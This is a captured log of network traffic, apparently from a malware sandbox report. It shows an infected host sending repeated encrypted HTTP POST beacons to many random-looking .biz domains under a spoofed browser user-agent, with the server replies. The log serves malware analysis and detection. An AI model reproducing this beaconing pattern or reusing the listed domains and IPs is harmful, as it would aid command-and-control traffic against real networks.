                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.475212097 CET832OUTData Raw: d6 53 e9 af b6 c8 92 e5 34 03 00 00 b3 6b c1 1e dc 5a 58 8f 39 71 d3 f8 3b bd 73 af 4f 40 99 a6 57 78 37 aa 56 49 b6 51 a2 4e f6 29 ec a8 bb fa 21 fa 5a 3a ab a9 42 e7 e5 b9 66 d1 e7 65 0d d7 c5 e1 01 e7 ba 69 17 e5 18 a9 5f 1e d8 d0 bf 28 08 15
                                                                                                                                                                                                                                                                                                                                Data Ascii: S4kZX9q;sO@Wx7VIQN)!Z:Bfei_(CPFLJ=b-^<f+gtC;hM`x&X'P@v_,(8|e)?R5]r.P@&lN?/lsJ
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.985582113 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 580
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.050230980 CET351OUTPOST /xalserxg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.050250053 CET832OUTData Raw: 17 26 43 80 c0 06 54 7e 34 03 00 00 ce 29 43 f2 76 04 45 08 a9 b0 ba 1f 2f 64 37 37 fa 2b 71 90 d9 b8 e6 af d3 f7 7b 67 be e7 49 4b 31 c7 2d e3 a2 ee 4b dd 73 26 3d 1e 2a 2c b2 75 cc d8 eb ff 54 8c 0a 95 63 87 2a 66 c0 6c 55 5c f0 af bf 8a b6 a4
                                                                                                                                                                                                                                                                                                                                Data Ascii: &CT~4)CvE/d77+q{gIK1-Ks&=*,uTc*flU\vqnanLqTp82(F#ev2R3D8-P8hLj?r~x6r/Li~(&Jb5d$G8w`-<U
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.171945095 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 580
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                46192.168.2.55003054.244.188.17780
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.137067080 CET346OUTPOST /wt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.137111902 CET832OUTData Raw: 0d 13 2e 48 ec 97 7f 00 34 03 00 00 25 3c 10 f4 06 10 ab f1 47 a0 63 21 25 8e ca fc c9 c3 b7 9f 96 67 cc 75 a2 9a f5 3b f3 b7 1b 69 f8 77 8e 32 a7 b3 33 d9 98 a0 2e 0b b6 bd 59 f9 50 f3 97 f5 37 cd 17 48 d2 ac 10 16 70 76 58 8f 2c bc 96 df 84 ae
                                                                                                                                                                                                                                                                                                                                Data Ascii: .H4%<Gc!%gu;iw23.YP7HpvX,C|?Q24?\TOtCVO"+<0;-a/Io5${}UH/.7T|=[|"XTKoUL=%-exvEPx! *v
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.861685991 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e83e7d79ff51e6c853ecf96b836e9611|8.46.123.75|1732094804|1732094804|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                47192.168.2.55003118.141.10.10780
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.058069944 CET348OUTPOST /txsxc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.058069944 CET832OUTData Raw: fe 13 21 43 6a fa 30 12 34 03 00 00 05 90 90 63 cc 59 5e 31 ce 78 0e f1 02 b6 6c 1e da 43 68 7b b7 9a 6b ef cd 74 04 5e 64 ab e7 d5 14 51 67 26 25 18 ab b5 9f b4 40 85 4a 7d 11 80 61 3f 41 bc 17 79 9a 12 5c 61 46 c6 1b f4 ed 8a 57 50 9e 18 b3 9f
                                                                                                                                                                                                                                                                                                                                Data Ascii: !Cj04cY^1xlCh{kt^dQg&%@J}a?Ay\aFWPV(ch/V4?XE[-Mi-P}DJa*%hxb2"nx!B0v9 >vpx6(*g[O~#`pt-u3;zTs':G
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.478861094 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:46 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e6997227e07a7bf90645c1003521e367|8.46.123.75|1732094806|1732094806|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                48192.168.2.55003218.208.156.24880
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.735423088 CET347OUTPOST /klerpi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.735472918 CET832OUTData Raw: 34 59 1e 5e 63 b7 81 03 34 03 00 00 ae 7a 7d 68 06 5b 3f 33 0c c5 6e 36 d5 aa 04 a8 7e 69 10 de 2f e0 9e fe c9 d9 ac fa a4 1a 8d 97 c3 09 a0 ea c7 ed 07 5e d9 1b 0f d8 13 ec 73 58 61 ad 6f fe f9 67 a3 5f cb fa 4d cd 49 b8 5a 7a 2c 9d 98 a5 63 93
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4Y^c4z}h[?3n6~i/^sXaog_MIZz,cg\ A@.w7698NU&PI?Xu@pQbu&gW~R;.O)=+U+3{3}VX%sR.O:irI.}
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.183767080 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:47 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=a0bf06b6c40252d526d71f9db6481cac|8.46.123.75|1732094807|1732094807|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                49192.168.2.55003344.221.84.10580
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.531138897 CET356OUTPOST /qehuuaxgtrfd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.531205893 CET832OUTData Raw: aa 99 8a 6a e7 86 14 1c 34 03 00 00 b5 7e bf f4 6a 8b 06 f6 c8 01 ae bc c5 f3 25 77 08 74 ef 67 dd 74 01 d9 dc 72 3e 7a ca 14 f3 34 b8 5a a2 84 ce 4d af 55 54 a7 1d 16 4d 98 f7 6e 5b d6 e1 72 18 3c 8b f8 b2 c0 7c 81 45 54 25 9c f8 68 f6 f1 99 ce
                                                                                                                                                                                                                                                                                                                                Data Ascii: j4~j%wtgtr>z4ZMUTMn[r<|ET%hEx0(m@qf"i}CzErd]#37v8iQ5\ib+&cKl48&(bI s}^O%\RV3575XeY?hJ*3f9J-_E
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.989826918 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:47 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=6792ac43bdd7183936b5b16683910652|8.46.123.75|1732094807|1732094807|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                50192.168.2.55003418.141.10.10780
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.304819107 CET356OUTPOST /srktyhawgjwb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.304852009 CET832OUTData Raw: 1b 2c 09 72 a7 6d db 81 34 03 00 00 e1 81 a3 d1 14 ae 47 c8 62 9b 37 52 63 44 65 3b 45 29 7e ef 77 7e 92 e5 d6 14 55 97 ba e1 39 3a f3 c7 ce 5d 38 12 96 94 5e 8b de 9c 3a 8a fa 0f fb 2a 76 d0 0f 79 23 92 a9 f7 26 20 0d 8c 2b 24 42 d2 4f 1e 30 0b
                                                                                                                                                                                                                                                                                                                                Data Ascii: ,rm4Gb7RcDe;E)~w~U9:]8^:*vy#& +$BO0Y^FwHa/D.]?6SxNWRY.b-=FW\V$,O]Kw+usYhhq74yn9!0 4okbDtq4Q
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.216864109 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:49 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=93a03cb1a6c782151e16afec570a4997|8.46.123.75|1732094809|1732094809|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                51192.168.2.55003618.208.156.24880
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.260186911 CET350OUTPOST /wdbsnc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.260308027 CET832OUTData Raw: 8e 82 9f 0f 59 de 93 52 34 03 00 00 03 39 95 c9 a8 ae c8 73 87 79 ad 9a 65 58 9a e8 2c 98 7d e4 ba cd 86 22 3d 72 a6 3c 92 15 57 14 bc 55 0d c0 d3 5d 74 c6 5b 90 5c 0b 49 ec 78 cc 6a e7 b6 c8 1e 7c f6 57 9a a4 59 ef 92 4c ca 81 c8 ec fe 93 4e 5d
                                                                                                                                                                                                                                                                                                                                Data Ascii: YR49syeX,}"=r<WU]t[\Ixj|WYLN]cK:<o<U|P^0gVVxKrK"l"L4}V/Xu{H/InHOrN[j@b BiwN~(#F^Ko,
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.780299902 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:51 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=4ed0b599f5a18214a35d2b98229b9ded|8.46.123.75|1732094811|1732094811|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                52192.168.2.55003713.251.16.15080
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.156621933 CET350OUTPOST /yngosjtj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.156639099 CET832OUTData Raw: 4d 59 a3 29 59 b4 51 1a 34 03 00 00 58 ff d6 02 7f 81 30 77 fc 75 14 36 b5 bc 01 f1 af 03 21 ea b9 db 7b 81 60 12 47 64 44 75 87 8f a8 ff 65 8f 13 d4 98 16 16 c5 78 f3 12 40 44 8e 88 87 99 0f e2 37 92 b6 5a 0d f7 a5 f9 05 23 cc 00 c9 e9 29 44 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: MY)YQ4X0wu6!{`GdDuex@D7Z#)Dt8H6m=_Yy+e px]ml^3T7[<;pw2BFv@]fXpeXRsBl4%eRi*s!J G9jC)ua(G#DT#$
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.586220980 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:53 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=ffffb99201b34fbf0d3c9457c6c2d0f5|8.46.123.75|1732094813|1732094813|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                53192.168.2.55003813.251.16.15080
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.701181889 CET352OUTPOST /xwpgxeg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.701215982 CET832OUTData Raw: ee 07 bb d1 6b ba 68 bb 34 03 00 00 69 8f cd ac c4 44 ca c8 b4 f7 9c 96 ab 76 53 dd d2 6c 48 61 7b 06 ba ac 48 80 21 6a ae 63 21 e0 ac 3f 66 52 99 e6 b2 93 7d cb 7f e1 a9 c3 c7 4b 02 19 c1 48 6b 53 fc 71 5b 3a 49 87 a8 1f e7 43 a3 40 a0 03 21 60
                                                                                                                                                                                                                                                                                                                                Data Ascii: kh4iDvSlHa{H!jc!?fR}KHkSq[:IC@!`& ]<=A|a8GO5CF<QZ~/sj `!*Kz|k&D #_MXU9s'~V(1&FJdTxJPgZFC}yqig2:
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123192072 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:54 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=057736d91e183e6e76cd94369e8294f4|8.46.123.75|1732094814|1732094814|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                54192.168.2.55004047.129.31.21280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057140112 CET346OUTPOST /hppl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ftxlah.biz
